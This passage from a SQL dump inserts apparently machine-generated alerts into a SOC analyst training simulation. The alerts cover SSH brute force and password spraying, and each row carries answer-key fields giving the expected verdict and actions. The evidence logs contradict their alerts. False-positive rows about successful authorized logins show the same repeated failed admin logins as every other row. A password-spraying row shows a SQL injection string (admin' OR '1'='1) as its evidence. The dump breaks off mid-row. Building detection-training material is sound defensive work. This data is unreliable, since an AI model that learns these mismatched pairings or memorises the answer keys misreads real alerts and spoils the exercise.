(1682, 'SSH Login Attempt from Suspicious External IP', 'high', 'Splunk', 'An external IP has been attempting to login via SSH, showing signs of a brute force attack.', 'Brute Force', 'T1110', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T09:14:56Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.114.56\",\"dst_ip\":\"10.0.0.11\",\"username\":\"root\",\"hostname\":\"main-server\",\"failed_attempts\":50}', '2026-03-15 19:40:23', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.114.56\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP frequently reported for SSH brute force attempts\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"root\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Common administrative username targeted\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The repeated and rapid login attempts from a known malicious IP validate the attack.\"}', 'Beginner', 'SIEM', 3, 1, 'ENERGY', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.966Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:14:56Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.114.56\\\",\\\"dst_ip\\\":\\\"10.0.0.11\\\",\\\"username\\\":\\\"root\\\",\\\"hostname\\\":\\\"main-server\\\",\\\"failed_attempts\\\":50}\"},{\"timestamp\":\"2026-03-15T20:57:15.966Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:14:56Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.114.56\\\",\\\"dst_ip\\\":\\\"10.0.0.11\\\",\\\"username\\\":\\\"root\\\",\\\"hostname\\\":\\\"main-server\\\",\\\"failed_attempts\\\":50}\"},{\"timestamp\":\"2026-03-15T20:56:15.966Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:14:56Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.114.56\\\",\\\"dst_ip\\\":\\\"10.0.0.11\\\",\\\"username\\\":\\\"root\\\",\\\"hostname\\\":\\\"main-server\\\",\\\"failed_attempts\\\":50}\"},{\"timestamp\":\"2026-03-15T20:55:15.966Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:14:56Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.114.56\\\",\\\"dst_ip\\\":\\\"10.0.0.11\\\",\\\"username\\\":\\\"root\\\",\\\"hostname\\\":\\\"main-server\\\",\\\"failed_attempts\\\":50}\"},{\"timestamp\":\"2026-03-15T20:54:15.966Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:14:56Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.114.56\\\",\\\"dst_ip\\\":\\\"10.0.0.11\\\",\\\"username\\\":\\\"root\\\",\\\"hostname\\\":\\\"main-server\\\",\\\"failed_attempts\\\":50}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1683, 'False Positive: Scheduled Maintenance Login', 'low', 'Wazuh', 'Detected login attempts from an internal IP that match scheduled maintenance activities.', 'Brute Force', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-15T10:02:14Z\",\"event_type\":\"login_success\",\"src_ip\":\"192.168.1.25\",\"dst_ip\":\"192.168.1.30\",\"username\":\"maintenance\",\"hostname\":\"maintenance-server\",\"failed_attempts\":1}', '2026-03-15 19:40:23', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP associated with known maintenance activities\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"maintenance\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Username for scheduled maintenance tasks\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The login activity aligns with expected maintenance operations.\"}', 'Beginner', 'SIEM', 3, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.969Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T10:02:14Z\\\",\\\"event_type\\\":\\\"login_success\\\",\\\"src_ip\\\":\\\"192.168.1.25\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"username\\\":\\\"maintenance\\\",\\\"hostname\\\":\\\"maintenance-server\\\",\\\"failed_attempts\\\":1}\"},{\"timestamp\":\"2026-03-15T20:57:15.969Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T10:02:14Z\\\",\\\"event_type\\\":\\\"login_success\\\",\\\"src_ip\\\":\\\"192.168.1.25\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"username\\\":\\\"maintenance\\\",\\\"hostname\\\":\\\"maintenance-server\\\",\\\"failed_attempts\\\":1}\"},{\"timestamp\":\"2026-03-15T20:56:15.969Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T10:02:14Z\\\",\\\"event_type\\\":\\\"login_success\\\",\\\"src_ip\\\":\\\"192.168.1.25\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"username\\\":\\\"maintenance\\\",\\\"hostname\\\":\\\"maintenance-server\\\",\\\"failed_attempts\\\":1}\"},{\"timestamp\":\"2026-03-15T20:55:15.969Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T10:02:14Z\\\",\\\"event_type\\\":\\\"login_success\\\",\\\"src_ip\\\":\\\"192.168.1.25\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"username\\\":\\\"maintenance\\\",\\\"hostname\\\":\\\"maintenance-server\\\",\\\"failed_attempts\\\":1}\"},{\"timestamp\":\"2026-03-15T20:54:15.969Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T10:02:14Z\\\",\\\"event_type\\\":\\\"login_success\\\",\\\"src_ip\\\":\\\"192.168.1.25\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"username\\\":\\\"maintenance\\\",\\\"hostname\\\":\\\"maintenance-server\\\",\\\"failed_attempts\\\":1}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1684, 'Suspicious Login Attempts from Known Malicious IP', 'high', 'Azure Sentinel', 'A known malicious IP has been attempting unauthorized logins, indicating a brute force attack.', 'Brute Force', 'T1110', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T11:28:42Z\",\"event_type\":\"login_failure\",\"src_ip\":\"198.51.100.78\",\"dst_ip\":\"10.0.0.8\",\"username\":\"administrator\",\"hostname\":\"core-server\",\"failed_attempts\":45}', '2026-03-15 19:40:23', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.78\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported multiple times for malicious activities\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"administrator\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Common administrative account\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The IP\'s malicious history corroborates the detected attack pattern.\"}', 'Beginner', 'SIEM', 3, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.972Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:28:42Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.78\\\",\\\"dst_ip\\\":\\\"10.0.0.8\\\",\\\"username\\\":\\\"administrator\\\",\\\"hostname\\\":\\\"core-server\\\",\\\"failed_attempts\\\":45}\"},{\"timestamp\":\"2026-03-15T20:57:15.972Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:28:42Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.78\\\",\\\"dst_ip\\\":\\\"10.0.0.8\\\",\\\"username\\\":\\\"administrator\\\",\\\"hostname\\\":\\\"core-server\\\",\\\"failed_attempts\\\":45}\"},{\"timestamp\":\"2026-03-15T20:56:15.972Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:28:42Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.78\\\",\\\"dst_ip\\\":\\\"10.0.0.8\\\",\\\"username\\\":\\\"administrator\\\",\\\"hostname\\\":\\\"core-server\\\",\\\"failed_attempts\\\":45}\"},{\"timestamp\":\"2026-03-15T20:55:15.972Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:28:42Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.78\\\",\\\"dst_ip\\\":\\\"10.0.0.8\\\",\\\"username\\\":\\\"administrator\\\",\\\"hostname\\\":\\\"core-server\\\",\\\"failed_attempts\\\":45}\"},{\"timestamp\":\"2026-03-15T20:54:15.972Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:28:42Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.78\\\",\\\"dst_ip\\\":\\\"10.0.0.8\\\",\\\"username\\\":\\\"administrator\\\",\\\"hostname\\\":\\\"core-server\\\",\\\"failed_attempts\\\":45}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1685, 'Potential Password Spraying Detected', 'medium', 'Elastic SIEM', 'An external IP address has been attempting multiple logins, possibly indicating a password spraying attempt.', 'Credential Attack', 'T1110', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T12:31:29Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.67\",\"dst_ip\":\"192.168.1.15\",\"username\":\"user1\",\"hostname\":\"company-portal\",\"failed_attempts\":35}', '2026-03-15 19:40:23', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.67\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP involved in previous password spraying incidents\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"user1\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Username targeted in the attack\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The pattern of failed attempts and external IP reputation confirm the attack.\"}', 'Beginner', 'SIEM', 3, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.974Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T12:31:29Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.67\\\",\\\"dst_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"user1\\\",\\\"hostname\\\":\\\"company-portal\\\",\\\"failed_attempts\\\":35}\"},{\"timestamp\":\"2026-03-15T20:57:15.974Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T12:31:29Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.67\\\",\\\"dst_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"user1\\\",\\\"hostname\\\":\\\"company-portal\\\",\\\"failed_attempts\\\":35}\"},{\"timestamp\":\"2026-03-15T20:56:15.974Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T12:31:29Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.67\\\",\\\"dst_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"user1\\\",\\\"hostname\\\":\\\"company-portal\\\",\\\"failed_attempts\\\":35}\"},{\"timestamp\":\"2026-03-15T20:55:15.974Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T12:31:29Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.67\\\",\\\"dst_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"user1\\\",\\\"hostname\\\":\\\"company-portal\\\",\\\"failed_attempts\\\":35}\"},{\"timestamp\":\"2026-03-15T20:54:15.974Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T12:31:29Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.67\\\",\\\"dst_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"user1\\\",\\\"hostname\\\":\\\"company-portal\\\",\\\"failed_attempts\\\":35}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1686, 'False Positive: Authorized User Activity', 'low', 'Splunk', 'Detected login attempts from an internal IP by an authorized user, not a security threat.', 'Brute Force', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-15T13:05:59Z\",\"event_type\":\"login_success\",\"src_ip\":\"192.168.0.50\",\"dst_ip\":\"192.168.0.60\",\"username\":\"authorized_user\",\"hostname\":\"internal-server\",\"failed_attempts\":0}', '2026-03-15 19:40:23', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.0.50\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP used by authorized personnel\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"authorized_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Authorized user for internal systems\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The activity is legitimate, originating from a known user and IP.\"}', 'Beginner', 'SIEM', 3, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.979Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T13:05:59Z\\\",\\\"event_type\\\":\\\"login_success\\\",\\\"src_ip\\\":\\\"192.168.0.50\\\",\\\"dst_ip\\\":\\\"192.168.0.60\\\",\\\"username\\\":\\\"authorized_user\\\",\\\"hostname\\\":\\\"internal-server\\\",\\\"failed_attempts\\\":0}\"},{\"timestamp\":\"2026-03-15T20:57:15.979Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T13:05:59Z\\\",\\\"event_type\\\":\\\"login_success\\\",\\\"src_ip\\\":\\\"192.168.0.50\\\",\\\"dst_ip\\\":\\\"192.168.0.60\\\",\\\"username\\\":\\\"authorized_user\\\",\\\"hostname\\\":\\\"internal-server\\\",\\\"failed_attempts\\\":0}\"},{\"timestamp\":\"2026-03-15T20:56:15.979Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T13:05:59Z\\\",\\\"event_type\\\":\\\"login_success\\\",\\\"src_ip\\\":\\\"192.168.0.50\\\",\\\"dst_ip\\\":\\\"192.168.0.60\\\",\\\"username\\\":\\\"authorized_user\\\",\\\"hostname\\\":\\\"internal-server\\\",\\\"failed_attempts\\\":0}\"},{\"timestamp\":\"2026-03-15T20:55:15.979Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T13:05:59Z\\\",\\\"event_type\\\":\\\"login_success\\\",\\\"src_ip\\\":\\\"192.168.0.50\\\",\\\"dst_ip\\\":\\\"192.168.0.60\\\",\\\"username\\\":\\\"authorized_user\\\",\\\"hostname\\\":\\\"internal-server\\\",\\\"failed_attempts\\\":0}\"},{\"timestamp\":\"2026-03-15T20:54:15.979Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T13:05:59Z\\\",\\\"event_type\\\":\\\"login_success\\\",\\\"src_ip\\\":\\\"192.168.0.50\\\",\\\"dst_ip\\\":\\\"192.168.0.60\\\",\\\"username\\\":\\\"authorized_user\\\",\\\"hostname\\\":\\\"internal-server\\\",\\\"failed_attempts\\\":0}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1687, 'Password Spraying Attack Detected on Internal Web Portal', 'high', 'Splunk', 'Multiple failed login attempts detected from a foreign IP address targeting the internal web portal. This indicates a potential password spraying attack.', 'Brute Force', 'T1110', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T05:34:22Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"10.1.1.5\",\"username\":\"jdoe\",\"hostname\":\"webportal01\",\"request_body\":null,\"command_line\":null}', '2026-03-15 19:41:31', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for brute force attacks\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.1.1.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the web portal\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Audit\",\"verdict\":\"internal\",\"details\":\"Internal user account involved in the attack\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The foreign IP has a history of brute force attempts, confirming the attack.\"}', 'Beginner', 'SIEM', 3, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.981Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T05:34:22Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"10.1.1.5\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"webportal01\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-03-15T20:57:15.981Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T05:34:22Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"10.1.1.5\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"webportal01\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-03-15T20:56:15.981Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T05:34:22Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"10.1.1.5\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"webportal01\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-03-15T20:55:15.981Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T05:34:22Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"10.1.1.5\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"webportal01\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-03-15T20:54:15.981Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T05:34:22Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"10.1.1.5\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"webportal01\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"}],\"query\":\"index=main source=\\\"/var/log/nginx/access.log\\\" | head 100\"}}', 0),
(1688, 'SSH Brute Force Spike Detected', 'critical', 'Elastic SIEM', 'A significant increase in SSH login failures from an external IP indicates a brute force attack against the server.', 'Brute Force', 'T1110', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T07:45:10Z\",\"event_type\":\"login_failure\",\"src_ip\":\"198.51.100.23\",\"dst_ip\":\"192.168.1.100\",\"username\":\"admin\",\"hostname\":\"server01\",\"request_body\":null,\"command_line\":null}', '2026-03-15 19:41:31', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP involved in multiple SSH brute force attacks\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal server IP address\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Audit\",\"verdict\":\"internal\",\"details\":\"Commonly targeted admin account\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"IP has a history of malicious activity, confirming its involvement in the attack.\"}', 'Beginner', 'SIEM', 3, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.983Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 